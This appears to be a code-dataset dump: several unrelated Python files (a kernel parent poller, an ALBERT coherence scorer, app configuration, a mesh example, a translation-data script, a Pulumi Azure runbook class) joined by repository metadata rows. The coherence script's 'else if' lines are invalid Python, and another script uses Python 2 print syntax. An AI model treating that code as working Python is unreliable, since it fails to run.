time.sleep(1.0)
except OSError as e:
if e.errno == EINTR:
continue
raise
class ParentPollerWindows(Thread):
""" A Windows-specific daemon thread that listens for a special event that
signals an interrupt and, optionally, terminates the program immediately
when the parent process no longer exists.
"""
def __init__(self, interrupt_handle=None, parent_handle=None):
""" Create the poller. At least one of the optional parameters must be
provided.
Parameters
----------
interrupt_handle : HANDLE (int), optional
If provided, the program will generate a Ctrl+C event when this
handle is signaled.
parent_handle : HANDLE (int), optional
If provided, the program will terminate immediately when this
handle is signaled.
"""
assert(interrupt_handle or parent_handle)
super().__init__()
if ctypes is None:
raise ImportError("ParentPollerWindows requires ctypes")
self.daemon = True
self.interrupt_handle = interrupt_handle
self.parent_handle = parent_handle
def run(self):
""" Run the poll loop. This method never returns.
"""
try:
from _winapi import WAIT_OBJECT_0, INFINITE
except ImportError:
from _subprocess import WAIT_OBJECT_0, INFINITE
# Build the list of handle to listen on.
handles = []
if self.interrupt_handle:
handles.append(self.interrupt_handle)
if self.parent_handle:
handles.append(self.parent_handle)
arch = platform.architecture()[0]
c_int = ctypes.c_int64 if arch.startswith('64') else ctypes.c_int
# Listen forever.
while True:
result = ctypes.windll.kernel32.WaitForMultipleObjects(
len(handles), # nCount
(c_int * len(handles))(*handles), # lpHandles
False, # bWaitAll
INFINITE) # dwMilliseconds
if WAIT_OBJECT_0 <= result < len(handles):
handle = handles[result - WAIT_OBJECT_0]
if handle == self.interrupt_handle:
# check if signal handler is callable
# to avoid 'int not callable' error (Python issue #23395)
if callable(signal.getsignal(signal.SIGINT)):
interrupt_main()
elif handle == self.parent_handle:
get_logger().warning("Parent appears to have exited, shutting down.")
os._exit(1)
elif result < 0:
# wait failed, just give up and stop polling.
warnings.warn("""Parent poll failed. If the frontend dies,
the kernel may be left running. Please let us know
about your system (bitness, Python, etc.) at
[email protected]""")
return
| 35.649123 | 89 | 0.581201 |
4a2124bdc5b263152901579b28e8c9156043b1ae | 8,666 | py | Python | eval/coherence.py | L-Zhe/CoRPG | aa7a14a2b1c5397b327b4f91846795f7956bf2cd | [
"MIT"
] | 13 | 2021-09-15T05:44:05.000Z | 2022-03-24T12:24:00.000Z | eval/coherence.py | L-Zhe/CoRPG | aa7a14a2b1c5397b327b4f91846795f7956bf2cd | [
"MIT"
] | null | null | null | eval/coherence.py | L-Zhe/CoRPG | aa7a14a2b1c5397b327b4f91846795f7956bf2cd | [
"MIT"
] | 4 | 2021-09-17T20:00:48.000Z | 2022-03-10T03:09:57.000Z | from transformers import AlbertTokenizer, AlbertForPreTraining
import torch
from torch import nn
from torch.nn import functional as F
from tqdm import tqdm
import random
import time
import torch_optimizer as optim
import argparse
from nltk.tokenize import sent_tokenize
def split_sent(sent):
ans = list(sent_tokenize(sent))
return ans
def read(file, split=False):
with open(file, 'r') as f:
if split:
return [[seq for seq in split_sent(line.strip('\n').strip())] for line in f.readlines()]
else:
return [line.strip('\n').strip().split('\t') for line in f.readlines()]
def write(data, file):
with open(file, 'w') as f:
for line in data:
f.write(line)
f.write('\n')
@torch.no_grad()
def cal_graph(data=None, pretrain_model=None):
tokenizer = AlbertTokenizer.from_pretrained(pretrain_model)
model = AlbertForPreTraining.from_pretrained(pretrain_model).cuda()
model.eval()
graph = []
prompt = []
next_sentence = []
for seq in tqdm(data):
for i in range(len(seq)):
for j in range(len(seq)):
prompt.append(seq[i])
next_sentence.append(seq[j])
encoding = move2cuda(tokenizer(prompt, next_sentence, return_tensors='pt',
add_special_tokens=True, padding=True))
outputs = model(**encoding, labels=torch.LongTensor([1] * len(prompt)).cuda())
logits = outputs.sop_logits
prob = F.softmax(logits, dim=-1)[:, 1].view(-1, len(seq) ** 2)
_tmp = [' '.join([str(num) for num in line]) for line in prob.tolist()]
graph.extend(_tmp)
prompt = []
next_sentence = []
# if len(prompt) != 0:
# encoding = move2cuda(tokenizer(prompt, next_sentence, return_tensors='pt',
# add_special_tokens=True, padding=True))
# outputs = model(**encoding, labels=torch.LongTensor([1] * len(prompt)).cuda())
# logits = outputs.sop_logits
# prob = F.softmax(logits, dim=-1)[:, 1].view(-1, 25)
# _tmp = [' '.join([str(num) for num in line]) for line in prob.tolist()]
# graph.extend(_tmp)
return graph
@torch.no_grad()
def COH(data, pretrain_model):
tokenizer = AlbertTokenizer.from_pretrained(pretrain_model)
model = AlbertForPreTraining.from_pretrained(pretrain_model).cuda()
model.eval()
total_prob = 0
total_cnt = 0
prompt = []
next_sentence = []
cnt = 0
for seq in tqdm(data):
for i in range(len(seq) - 1):
prompt.append(seq[i])
next_sentence.append(seq[i + 1])
# print(len(seq))
if len(seq) > 1:
encoding = move2cuda(tokenizer(prompt, next_sentence, return_tensors='pt',
add_special_tokens=True, padding=True))
outputs = model(**encoding, labels=torch.LongTensor([1] * len(prompt)).cuda())
logits = outputs.sop_logits
prob = F.softmax(logits, dim=-1)[:, 1].view(-1, len(seq) - 1)
total_prob += prob.mean(dim=1).item()
total_cnt += (prob > 0.5).float().mean(dim=-1).item()
else:
cnt += 1
prompt = []
next_sentence = []
print("COH-p: %f\tCOH: %f" % (total_prob / (len(data) - cnt), total_cnt / (len(data) - cnt)))
def data_process(file, train_num=30000, test_num=1000):
with open(file, 'r') as f:
corpus = [[seq.lower().strip() for seq in line.strip('\n').strip().split('\t')] for line in f.readlines()]
data = []
for line in corpus:
for i in range(len(line) - 1):
data.append((line[i], line[i + 1]))
random.shuffle(data)
return data[:train_num], data[train_num:test_num + train_num]
def data_loader(data, batch_size):
st = 0
ed = batch_size
random.shuffle(data)
while st < len(data):
_data = data[st:ed]
st = ed
ed = min(ed + batch_size, len(data))
yield _data
def move2cuda(data):
for key in data.keys():
if data[key].size(1) > 512:
data[key] = data[key][:, :512]
data[key] = data[key].cuda()
return data
def train(model,
tokenizer,
criterion,
optim,
train_data,
test_data,
batch_size,
epoch,
checkpoint_path,
grad_accum_step):
model.train()
best_score = 0
for e in range(epoch):
total_loss = 0
total_cnt = 0
accum_cnt = 0
st_time = time.time()
for i, data in enumerate(data_loader(train_data, batch_size)):
optim.zero_grad()
prompt, next_sentence = zip(*data)
label_true = torch.ones(len(data)).long().cuda()
label_false = torch.zeros(len(data)).long().cuda()
input_true = tokenizer(prompt, next_sentence, return_tensors='pt',
padding=True, add_special_tokens=True)
output_true = model(**move2cuda(input_true)).sop_logits
loss_true = criterion(output_true, label_true) / 2
total_loss += loss_true.item()
loss_true.backward()
input_false = tokenizer(next_sentence, prompt, return_tensors='pt',
padding=True, add_special_tokens=True)
output_false = model(**move2cuda(input_false)).sop_logits
loss_false = criterion(output_false, label_false) / 2
total_loss += loss_false.item()
loss_false.backward()
accum_cnt += 1
if accum_cnt == grad_accum_step:
optim.step()
accum_cnt = 0
total_cnt += 1
if i % (10 * grad_accum_step) == 0:
print("epoch: %d\tbatch: %d\tloss: %f\ttime: %d\tbest_acc: %f%%"
% (e, i, total_loss / total_cnt, time.time() - st_time, best_score * 100))
total_loss = total_cnt = 0
st_time = time.time()
if accum_cnt != 0:
optim.step()
with torch.no_grad():
model.eval()
total_true = 0
total_cnt = 0
for data in tqdm(data_loader(test_data, batch_size)):
prompt, next_sentence = zip(*data)
input_true = tokenizer(prompt, next_sentence, return_tensors='pt',
padding=True, add_special_tokens=True)
output_true = model(**move2cuda(input_true)).sop_logits
total_true += (F.softmax(output_true, dim=-1)[:, 0] < 0.5).long().sum().item()
input_false = tokenizer(next_sentence, prompt, return_tensors='pt',
padding=True, add_special_tokens=True)
output_false = model(**move2cuda(input_false)).sop_logits
total_true += (F.softmax(output_false, dim=-1)[:, 0] > 0.5).long().sum().item()
total_cnt += 2 * len(data)
acc = total_true / total_cnt
print("valid acc: %f" % acc)
if best_score <= acc:
best_score = acc
torch.save(model.state_dict(), checkpoint_path)
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--train', action='store_true')
parser.add_argument('--inference', action='store_true')
parser.add_argument('--coh', action='store_true')
parser.add_argument('--pretrain_model', type=str)
parser.add_argument('--save_file', type=str, default=None)
parser.add_argument('--text_file', type=str)
return parser.parse_args()
if __name__ == '__main__':
args = get_parser()
if args.train:
tokenizer = AlbertTokenizer.from_pretrained(args.pretrain_model)
model = AlbertForPreTraining.from_pretrained(args.pretrain_model).cuda()
train_data, test_data = data_process(args.text_file)
criterion = nn.CrossEntropyLoss(reduction='mean')
optimizer = optim.Lamb(model.parameters(), lr=0.00176)
train(model=model,
tokenizer=tokenizer,
criterion=criterion,
optim=optimizer,
train_data=train_data,
test_data=test_data,
batch_size=128,
epoch=100,
checkpoint_path=args.save_file,
grad_accum_step=2)
else if args.inference:
# inference:
file = args.text_file
write(cal_graph(read(file), args.pretrain_model), file + '.graph')
# COH score
else if args.coh:
COH(read(args.text_file, split=True), args.pretrain_model)
| 39.21267 | 114 | 0.575583 |
4a2125942fcf2b69dee3cef9824c769679654583 | 3,098 | py | Python | app/cfg.py | frodejac/fastapi-postgres-celery | eddc9518a310d30011ce113fd1d0de6a9b027ad3 | [
"MIT"
] | null | null | null | app/cfg.py | frodejac/fastapi-postgres-celery | eddc9518a310d30011ce113fd1d0de6a9b027ad3 | [
"MIT"
] | null | null | null | app/cfg.py | frodejac/fastapi-postgres-celery | eddc9518a310d30011ce113fd1d0de6a9b027ad3 | [
"MIT"
] | null | null | null | from __future__ import annotations
import environs
from app.utils.singleton import Singleton
env: environs.Env = environs.Env()
env.read_env()
class AppConfig(metaclass=Singleton):
# App config
# SERVICE_NAME is set as an environment variable with Terraform
APP_TITLE: str = env.str("SERVICE_NAME", "app-api")
APP_API_V1_PREFIX: str = env.str("APP_OPENAPI_V1_PREFIX", "/api/v1")
APP_OPENAPI_URL: str = env.str(
"APP_OPENAPI_URL", f"{APP_API_V1_PREFIX}/openapi.json"
)
APP_DEBUG: bool = env.bool("APP_DEBUG", False)
API_DEFAULT_ORDER_BY: str = env.str("API_DEFAULT_ORDER_BY", "created_date")
API_DEFAULT_ORDER_DIR: str = env.str("API_DEFAULT_ORDER_DIR", "desc")
API_DEFAULT_LIMIT: int = env.int("API_DEFAULT_LIMIT", 50)
API_DEFAULT_PAGE: int = env.int("API_DEFAULT_PAGE", 0)
API_HOST: str = env.str("APP_API_HOST", "localhost")
API_PORT: str = env.str("APP_API_PORT", "80")
# DB config
POSTGRES_USER: str = env.str("POSTGRES_USER", "")
POSTGRES_PASSWORD: str = env.str("POSTGRES_PASSWORD", "")
POSTGRES_HOST: str = env.str("POSTGRES_HOST", "")
POSTGRES_PORT: int = env.int("POSTGRES_PORT", 5432)
POSTGRES_NAME: str = env.str("POSTGRES_NAME", "")
# noinspection PyPep8Naming
@property
def SQLALCHEMY_DATABASE_URI(self):
if uri := env("SQLALCHEMY_DATABASE_URI", None):
return uri
_db_credentials = ""
if self.POSTGRES_USER and self.POSTGRES_PASSWORD:
_db_credentials = "{user}:{pwd}".format(
user=self.POSTGRES_USER, pwd=self.POSTGRES_PASSWORD
)
elif self.POSTGRES_USER:
_db_credentials = self.POSTGRES_USER
# SQLAlchemy config
return "postgresql+psycopg2://{credentials}@{host}:{port}/{dbname}".format(
credentials=_db_credentials,
host=self.POSTGRES_HOST,
port=self.POSTGRES_PORT,
dbname=self.POSTGRES_NAME,
)
SQLALCHEMY_POOL_SIZE: int = env.int("SQLACLHEMY_POOL_SIZE", 10)
# Redis config
REDIS_HOST: str = env.str("REDIS_HOST", "localhost")
REDIS_PORT: int = env.int("REDIS_PORT", 6379)
REDIS_USER: str = env.str("REDIS_USER", "")
REDIS_PASS: str = env.str("REDIS_PASS", "")
# noinspection PyPep8Naming
@property
def CELERY_BROKER_URI(self):
if uri := env("CELERY_BROKER_URI", None):
return uri
_redis_credentials = ""
if self.REDIS_USER and self.REDIS_PASS:
_redis_credentials = f"{self.REDIS_USER}:{self.REDIS_PASS}"
elif self.REDIS_USER:
_redis_credentials = self.REDIS_USER
return "redis://{credentials}{host}:{port}".format(
credentials=f"{_redis_credentials}@" if _redis_credentials else "",
host=self.REDIS_HOST,
port=self.REDIS_PORT,
)
def __repr__(self):
return "\n".join(
[f"{k}: {getattr(self, k)}" for k in dir(self) if not k.startswith("_")]
)
def __str__(self):
return repr(self)
config = AppConfig()
| 33.311828 | 84 | 0.642995 |
4a21267a5afca84d7f15ccd48d4f1afc842c731f | 1,155 | py | Python | examples/example_vertex_voronoi.py | Brain-Slam/slam | a4ab0aec53f83f2b8947b8be8647b90711a795c3 | [
"MIT"
] | null | null | null | examples/example_vertex_voronoi.py | Brain-Slam/slam | a4ab0aec53f83f2b8947b8be8647b90711a795c3 | [
"MIT"
] | null | null | null | examples/example_vertex_voronoi.py | Brain-Slam/slam | a4ab0aec53f83f2b8947b8be8647b90711a795c3 | [
"MIT"
] | null | null | null | """
.. _example_vertex_voronoi:
===================================
Vertex voronoi example in slam
===================================
"""
# Authors:
# Guillaume Auzias <[email protected]>
# Julien Barrès <[email protected]>
# License: BSD (3-clause)
# sphinx_gallery_thumbnail_number = 2
###############################################################################
# Importation of slam modules
import slam.io as sio
import slam.plot as splt
import slam.vertex_voronoi as svv
import numpy as np
###############################################################################
#
mesh = sio.load_mesh("../examples/data/example_mesh.gii")
mesh.apply_transform(mesh.principal_inertia_transform)
###############################################################################
#
vert_vor = svv.vertex_voronoi(mesh)
print(mesh.vertices.shape)
print(vert_vor.shape)
print(np.sum(vert_vor) - mesh.area)
###############################################################################
# Visualization
visb_sc = splt.visbrain_plot(
mesh=mesh, tex=vert_vor, caption="vertex voronoi", cblabel="vertex voronoi"
)
visb_sc.preview()
| 26.860465 | 79 | 0.504762 |
4a21270a2f1c7564b4c6ed385b96519e875c0593 | 1,027 | py | Python | tensor2tensor/bin/translate_generate_all.py | cgebe/tensor2tensor | 8e2389021643774f81a3af643e55a856896aef5c | [
"Apache-2.0"
] | null | null | null | tensor2tensor/bin/translate_generate_all.py | cgebe/tensor2tensor | 8e2389021643774f81a3af643e55a856896aef5c | [
"Apache-2.0"
] | null | null | null | tensor2tensor/bin/translate_generate_all.py | cgebe/tensor2tensor | 8e2389021643774f81a3af643e55a856896aef5c | [
"Apache-2.0"
] | 1 | 2018-07-26T18:31:58.000Z | 2018-07-26T18:31:58.000Z | import os
TRANSLATE_PROBLEMS = [
"translate_csde_legal32k",
#"translate_csen_legal32k",
#"translate_cses_legal32k",
#"translate_csfr_legal32k",
#"translate_csit_legal32k",
#"translate_cssv_legal32k",
#"translate_deen_legal32k",
#"translate_dees_legal32k",
#"translate_defr_legal32k",
#"translate_deit_legal32k",
#"translate_desv_legal32k",
"translate_enes_legal32k",
#"translate_enfr_legal32k",
#"translate_enit_legal32k",
#"translate_ensv_legal32k",
"translate_esfr_legal32k",
#"translate_esit_legal32k",
#"translate_essv_legal32k",
"translate_frit_legal32k",
#"translate_frsv_legal32k",
"translate_itsv_legal32k"
]
def main():
for problem in TRANSLATE_PROBLEMS:
os.system("mkdir -p $DATA_DIR/translate/" + problem)
if os.system("python ./t2t-datagen --data_dir=$DATA_DIR --tmp_dir=$TMP_DIR --problem=" + problem) == 0:
continue
else:
print "ERROR " + problem
break
main()
| 26.333333 | 111 | 0.674781 |
4a212902dcd5f7bac65f0d511aa162f0f935fa05 | 1,334 | py | Python | iscc_core/__init__.py | iscc/iscc-core | 45cfb0c092ffb8dc97d926528cb2b16aa20e2c43 | [
"Apache-2.0"
] | 5 | 2021-08-31T19:06:57.000Z | 2022-01-13T16:11:22.000Z | iscc_core/__init__.py | iscc/iscc-core | 45cfb0c092ffb8dc97d926528cb2b16aa20e2c43 | [
"Apache-2.0"
] | 54 | 2021-12-25T11:25:09.000Z | 2022-03-03T09:04:31.000Z | iscc_core/__init__.py | iscc/iscc-core | 45cfb0c092ffb8dc97d926528cb2b16aa20e2c43 | [
"Apache-2.0"
] | null | null | null | __version__ = "0.2.0"
from iscc_core import options
core_opts = options.CoreOptions()
options_conformant = options.check_options(core_opts)
from iscc_core import conformance
from iscc_core.constants import *
from iscc_core.simhash import *
from iscc_core.minhash import *
from iscc_core.wtahash import *
from iscc_core.dct import *
from iscc_core.cdc import *
from iscc_core.iscc_code import (
gen_iscc_code,
gen_iscc_code_v0,
)
from iscc_core.iscc_id import (
gen_iscc_id,
gen_iscc_id_v0,
)
from iscc_core.code_meta import (
gen_meta_code,
gen_meta_code_v0,
)
from iscc_core.code_content_text import (
gen_text_code,
gen_text_code_v0,
collapse_text,
)
from iscc_core.code_content_image import (
gen_image_code,
gen_image_code_v0,
soft_hash_image_v0,
)
from iscc_core.code_content_audio import (
gen_audio_code,
gen_audio_code_v0,
)
from iscc_core.code_content_video import (
gen_video_code,
gen_video_code_v0,
)
from iscc_core.code_content_mixed import (
gen_mixed_code,
gen_mixed_code_v0,
)
from iscc_core.code_data import (
gen_data_code,
gen_data_code_v0,
)
from iscc_core.code_instance import gen_instance_code, gen_instance_code_v0, InstanceHasherV0
from iscc_core.codec import *
from iscc_core.utils import *
from iscc_core.models import Code
| 23 | 93 | 0.784108 |
4a2129a472b3a4d5361202a7fd9542e5337b1cc2 | 33,471 | py | Python | sdk/python/pulumi_azure/automation/run_book.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/automation/run_book.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/automation/run_book.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RunBookArgs', 'RunBook']
@pulumi.input_type
class RunBookArgs:
def __init__(__self__, *,
automation_account_name: pulumi.Input[str],
log_progress: pulumi.Input[bool],
log_verbose: pulumi.Input[bool],
resource_group_name: pulumi.Input[str],
runbook_type: pulumi.Input[str],
content: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
job_schedules: Optional[pulumi.Input[Sequence[pulumi.Input['RunBookJobScheduleArgs']]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
publish_content_link: Optional[pulumi.Input['RunBookPublishContentLinkArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a RunBook resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[bool] log_progress: Progress log option.
:param pulumi.Input[bool] log_verbose: Verbose log option.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] runbook_type: The type of the runbook - can be either `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
:param pulumi.Input[str] content: The desired content of the runbook.
:param pulumi.Input[str] description: A description for this credential.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Runbook. Changing this forces a new resource to be created.
:param pulumi.Input['RunBookPublishContentLinkArgs'] publish_content_link: The published runbook content link.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "automation_account_name", automation_account_name)
pulumi.set(__self__, "log_progress", log_progress)
pulumi.set(__self__, "log_verbose", log_verbose)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "runbook_type", runbook_type)
if content is not None:
pulumi.set(__self__, "content", content)
if description is not None:
pulumi.set(__self__, "description", description)
if job_schedules is not None:
pulumi.set(__self__, "job_schedules", job_schedules)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if publish_content_link is not None:
pulumi.set(__self__, "publish_content_link", publish_content_link)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> pulumi.Input[str]:
"""
The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@automation_account_name.setter
def automation_account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "automation_account_name", value)
@property
@pulumi.getter(name="logProgress")
def log_progress(self) -> pulumi.Input[bool]:
"""
Progress log option.
"""
return pulumi.get(self, "log_progress")
@log_progress.setter
def log_progress(self, value: pulumi.Input[bool]):
pulumi.set(self, "log_progress", value)
@property
@pulumi.getter(name="logVerbose")
def log_verbose(self) -> pulumi.Input[bool]:
"""
Verbose log option.
"""
return pulumi.get(self, "log_verbose")
@log_verbose.setter
def log_verbose(self, value: pulumi.Input[bool]):
pulumi.set(self, "log_verbose", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="runbookType")
def runbook_type(self) -> pulumi.Input[str]:
"""
The type of the runbook - can be either `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
"""
return pulumi.get(self, "runbook_type")
@runbook_type.setter
def runbook_type(self, value: pulumi.Input[str]):
pulumi.set(self, "runbook_type", value)
@property
@pulumi.getter
def content(self) -> Optional[pulumi.Input[str]]:
"""
The desired content of the runbook.
"""
return pulumi.get(self, "content")
@content.setter
def content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for this credential.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="jobSchedules")
def job_schedules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RunBookJobScheduleArgs']]]]:
return pulumi.get(self, "job_schedules")
@job_schedules.setter
def job_schedules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RunBookJobScheduleArgs']]]]):
pulumi.set(self, "job_schedules", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Runbook. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="publishContentLink")
def publish_content_link(self) -> Optional[pulumi.Input['RunBookPublishContentLinkArgs']]:
"""
The published runbook content link.
"""
return pulumi.get(self, "publish_content_link")
@publish_content_link.setter
def publish_content_link(self, value: Optional[pulumi.Input['RunBookPublishContentLinkArgs']]):
pulumi.set(self, "publish_content_link", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _RunBookState:
def __init__(__self__, *,
automation_account_name: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
job_schedules: Optional[pulumi.Input[Sequence[pulumi.Input['RunBookJobScheduleArgs']]]] = None,
location: Optional[pulumi.Input[str]] = None,
log_progress: Optional[pulumi.Input[bool]] = None,
log_verbose: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
publish_content_link: Optional[pulumi.Input['RunBookPublishContentLinkArgs']] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
runbook_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering RunBook resources.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] content: The desired content of the runbook.
:param pulumi.Input[str] description: A description for this credential.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[bool] log_progress: Progress log option.
:param pulumi.Input[bool] log_verbose: Verbose log option.
:param pulumi.Input[str] name: Specifies the name of the Runbook. Changing this forces a new resource to be created.
:param pulumi.Input['RunBookPublishContentLinkArgs'] publish_content_link: The published runbook content link.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] runbook_type: The type of the runbook - can be either `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if automation_account_name is not None:
pulumi.set(__self__, "automation_account_name", automation_account_name)
if content is not None:
pulumi.set(__self__, "content", content)
if description is not None:
pulumi.set(__self__, "description", description)
if job_schedules is not None:
pulumi.set(__self__, "job_schedules", job_schedules)
if location is not None:
pulumi.set(__self__, "location", location)
if log_progress is not None:
pulumi.set(__self__, "log_progress", log_progress)
if log_verbose is not None:
pulumi.set(__self__, "log_verbose", log_verbose)
if name is not None:
pulumi.set(__self__, "name", name)
if publish_content_link is not None:
pulumi.set(__self__, "publish_content_link", publish_content_link)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if runbook_type is not None:
pulumi.set(__self__, "runbook_type", runbook_type)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@automation_account_name.setter
def automation_account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "automation_account_name", value)
@property
@pulumi.getter
def content(self) -> Optional[pulumi.Input[str]]:
"""
The desired content of the runbook.
"""
return pulumi.get(self, "content")
@content.setter
def content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for this credential.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="jobSchedules")
def job_schedules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RunBookJobScheduleArgs']]]]:
return pulumi.get(self, "job_schedules")
@job_schedules.setter
def job_schedules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RunBookJobScheduleArgs']]]]):
pulumi.set(self, "job_schedules", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="logProgress")
def log_progress(self) -> Optional[pulumi.Input[bool]]:
"""
Progress log option.
"""
return pulumi.get(self, "log_progress")
@log_progress.setter
def log_progress(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "log_progress", value)
@property
@pulumi.getter(name="logVerbose")
def log_verbose(self) -> Optional[pulumi.Input[bool]]:
"""
Verbose log option.
"""
return pulumi.get(self, "log_verbose")
@log_verbose.setter
def log_verbose(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "log_verbose", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Runbook. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="publishContentLink")
def publish_content_link(self) -> Optional[pulumi.Input['RunBookPublishContentLinkArgs']]:
"""
The published runbook content link.
"""
return pulumi.get(self, "publish_content_link")
@publish_content_link.setter
def publish_content_link(self, value: Optional[pulumi.Input['RunBookPublishContentLinkArgs']]):
pulumi.set(self, "publish_content_link", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="runbookType")
def runbook_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the runbook - can be either `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
"""
return pulumi.get(self, "runbook_type")
@runbook_type.setter
def runbook_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "runbook_type", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
